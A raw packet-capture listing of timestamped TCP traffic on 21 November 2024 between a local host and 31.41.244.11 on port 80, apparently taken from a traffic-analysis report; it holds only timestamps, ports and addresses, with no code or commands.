                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.812536955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.812561035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.812586069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.812613964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.813740969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.813858986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.813931942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.814924002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.815023899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.815104961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.815793037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.815857887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.815880060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.815937996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.816914082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.816986084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.817011118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.817069054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.817955017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.818021059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.818049908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.818100929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.819036007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.819175005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.819238901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.820173025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.820235014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.820287943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.820343971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.821224928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.821290016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.821353912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.821409941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.822511911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.822578907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.822626114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.822675943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.823431969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.823575020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.823627949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.824479103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.824532986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.824625969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.824671984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.825579882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.825632095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.825644016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.825686932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.826663971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.826713085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.826783895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.827800989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.827861071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.827981949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.828027964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.828923941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.828953981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.828975916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.828999043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.829942942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.829997063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.830043077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.830089092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.831068039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.831141949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.831201077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.832096100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.832150936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.832216978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.832272053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.833261967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.833317041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.833360910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.833405972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.834501982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.834579945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.834589005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.834628105 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.835350990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.835463047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.835519075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.836584091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.836627960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.836661100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.836673975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.837557077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.837672949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.837728024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.838675022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.838732004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.838766098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.839678049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.839732885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.993304968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.993340969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.993376017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.993397951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.993454933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.993499994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.993594885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.993696928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.994594097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.994712114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.994730949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.994755030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.995671988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.995732069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.995771885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.995816946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.996779919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.996859074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.996896029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.996972084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.997839928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.997891903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.997930050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.997989893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.998980045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.999030113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.999070883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.999115944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.000029087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.000078917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.000123024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.000175953 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.001095057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.001174927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.001205921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.001251936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.002206087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.002255917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.002325058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.002383947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.003299952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.003360033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.003422022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.003480911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.004367113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.004409075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.004448891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.004497051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.005559921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.005631924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.005672932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.005697012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.006527901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.006649017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.006697893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.007666111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.007716894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.007787943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.007838964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.008738041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.008796930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.008863926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.008908987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.009809971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.009860992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.009893894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.009947062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.010950089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.010998011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.011051893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.011100054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.012003899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.012053967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.012092113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.012150049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.013092995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.013143063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.013209105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.013256073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.014195919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.014241934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.014297009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.014347076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.015273094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.015326977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.015363932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.015413046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.016335964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.016385078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.016434908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.016484022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.017467976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.017525911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.017565012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.017608881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.018589973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.018645048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.018769026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.018816948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.019623995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.019671917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.019690990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.019737959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.020704985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.020754099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.020823002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.020872116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.021835089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.021888018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.021976948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.022030115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.022908926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.022973061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.023014069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.023062944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.024027109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.024077892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.024171114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.024221897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.025083065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.025131941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.025172949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.025221109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.026182890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.026232958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.026330948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.026379108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.027443886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.027499914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.027584076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.027632952 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.028373003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.028422117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.028449059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.028497934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.029434919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.029485941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.029661894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.029711008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.030535936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.030585051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.030613899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.030661106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.031713009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.031729937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.031761885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.031774044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.032697916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.032747984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.032812119 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.032859087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.033860922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.033910036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.034024000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.034076929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.034883976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.034931898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.034959078 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.035007000 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.035979986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.036026955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.036061049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.036106110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.037067890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.037117958 CET4977080192.168.2.431.41.244.11
